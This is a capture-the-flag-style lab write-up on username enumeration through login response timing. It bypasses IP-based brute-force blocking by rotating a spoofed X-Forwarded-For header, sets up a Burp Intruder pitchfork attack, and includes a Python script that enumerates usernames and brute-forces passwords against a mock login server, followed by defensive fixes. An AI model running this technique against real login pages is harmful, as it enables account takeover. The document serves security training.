Username enumeration via response timing

This lab is harder than the other two. The first thing to notice is that it implements a form of IP-based brute-force protection. The lab description says this can be bypassed by manipulating HTTP request headers.

The hints section mentions the "X-Forwarded-For" HTTP header. A quick search gives us its definition: it is a header that proxies and load balancers add to record the original client IP address. If the application reads the client address from this header instead of the actual connection, then anyone who sends the header gets to choose what "IP" the application sees.

After a few unsuccessful login attempts, the login is blocked for 30 minutes.

So let's try to spoof our IP address with the "X-Forwarded-For" header by sending the request to Repeater.

Adding this header with a value of 1 spoofs our IP address, and the request is no longer blocked.

Also, by using Repeater with a valid username ("wiener") and passwords of different lengths, we can see that the response time grows with the length of the password. The server only spends time checking the password when the username exists, so the delay appears only for valid usernames, and a long password makes it easier to spot.

The next step is to send the request to Intruder to perform the brute-force attack, but this time we need two payloads: one to increment the value of the "X-Forwarded-For" header, and one with the usernames dictionary. Instead of the sniper attack type we need the pitchfork attack, which walks both payload sets in lockstep, so request N sends username N with X-Forwarded-For set to N.

For the first payload we use the "numbers" payload type, counting from 1 in steps of 1, so the header is incremented by 1 each iteration and every request appears to come from a new IP. Since the usernames list only has 100 usernames, we only need to count to 100.

The second payload will be a simple list, like the one used in the previous labs.

To see which username is the correct one, we need to check the response times, using a long password so the difference is clear. To do that, in the attack window click "Columns" and enable "Response received" and "Response completed". In this case, the response time for the username "guest" was significantly longer than for the others, so we can brute-force its password with the passwords wordlist, still rotating the "X-Forwarded-For" value, and look for a "302" response (the redirect on a successful login).
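The whole procedure above (the timing probe from the Repeater step, the pitchfork run with a rotating "X-Forwarded-For", and the password brute-force looking for the 302) in script form, as an added example that is not part of the lab or this write-up. The `LabServer` class is a constructed in-process stand-in for the lab's login endpoint: it keys the brute-force block on the client-supplied header and only runs a slow password hash (cost scaled with password length to mimic what was observed) when the username exists. The credentials, candidate list and wordlist are made up; the real attack would replace `server.login` with a function that performs the HTTP POST.

```python
"""Username enumeration via response timing, with X-Forwarded-For rotation.

Added example, not the lab's code. LabServer is a constructed stand-in for the
lab's login endpoint and reproduces the two behaviours the write-up relies on:
  1. brute-force protection keyed on the client-supplied X-Forwarded-For header;
  2. a slow password check that only runs when the username exists.
"""
import hashlib
import statistics
import time
from typing import Callable, Dict, List, Optional, Tuple

SendFn = Callable[[Dict[str, str], str, str], int]

# Constructed sample data (assumptions, not the lab's real lists).
CANDIDATES = ["admin", "root", "test", "carlos", "guest", "administrator", "wiener"]
WORDLIST = ["123456", "password", "peter", "secret", "letmein"]


class LabServer:
    """Constructed stand-in for the lab; the accounts below are made up."""

    BLOCK_AFTER = 3  # failed attempts per "IP" before the 30-minute block

    def __init__(self) -> None:
        self.users = {"wiener": "peter", "guest": "secret"}
        self.failures: Dict[str, int] = {}

    def login(self, headers: Dict[str, str], username: str, password: str) -> int:
        # Flaw 1: the limiter trusts a header the client controls.
        ip = headers.get("X-Forwarded-For", "10.0.0.1")
        if self.failures.get(ip, 0) >= self.BLOCK_AFTER:
            return 403  # "You have made too many incorrect login attempts"
        # Flaw 2: only existing users pay for the slow hash, and its cost grows
        # with password length (iteration count scaled with len() to mimic that).
        if username in self.users:
            hashlib.pbkdf2_hmac("sha256", password.encode(), b"salt",
                                1000 * max(1, len(password)))
            if password == self.users[username]:
                return 302  # redirect to /my-account on success
        self.failures[ip] = self.failures.get(ip, 0) + 1
        return 200  # login page re-rendered with "Invalid username or password"


def timed_request(send: SendFn, ip: str, username: str, password: str) -> Tuple[int, float]:
    """One login attempt plus its round-trip time (Intruder's "Response completed")."""
    t0 = time.perf_counter()
    status = send({"X-Forwarded-For": ip}, username, password)
    return status, time.perf_counter() - t0


def enumerate_usernames(send: SendFn, candidates: List[str], probe_password: str,
                        rotate_ip: bool = True, factor: float = 3.0) -> List[str]:
    """Pitchfork run: payload 1 is an incrementing X-Forwarded-For value, payload 2
    the username list. Usernames whose response time is far above the median
    (most candidates are invalid, so the median is the "fast" baseline) are reported."""
    timings: Dict[str, float] = {}
    for n, user in enumerate(candidates, start=1):
        ip = str(n) if rotate_ip else "1"  # rotate_ip=False shows what the block does
        _, elapsed = timed_request(send, ip, user, probe_password)
        timings[user] = elapsed
    baseline = statistics.median(timings.values())
    return sorted(u for u, t in timings.items() if t > factor * baseline)


def brute_force_password(send: SendFn, username: str, wordlist: List[str],
                         first_ip: int = 1000) -> Optional[str]:
    """Password brute-force for one username, still rotating the spoofed IP,
    stopping at the first 302."""
    for n, pw in enumerate(wordlist, start=first_ip):
        status, _ = timed_request(send, str(n), username, pw)
        if status == 302:
            return pw
    return None


if __name__ == "__main__":
    server = LabServer()
    # A long probe password widens the gap between valid and invalid usernames.
    found = enumerate_usernames(server.login, CANDIDATES, "A" * 100)
    print("usernames flagged by timing:", found)
    for user in found:
        print(user, "->", brute_force_password(server.login, user, WORDLIST))
```

Running it flags "guest" and "wiener" and recovers both passwords; running `enumerate_usernames` with `rotate_ip=False` instead gets the fake client blocked after three failures, after which every response (including one with the right password) comes back fast with a 403, which is why the header rotation is needed. On the defensive side the two flaws are fixed separately: derive the rate-limit key from the socket address (or only trust X-Forwarded-For from a known proxy), and run the same password hashing work whether or not the username exists.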

Logging in with this username and password completes the lab.
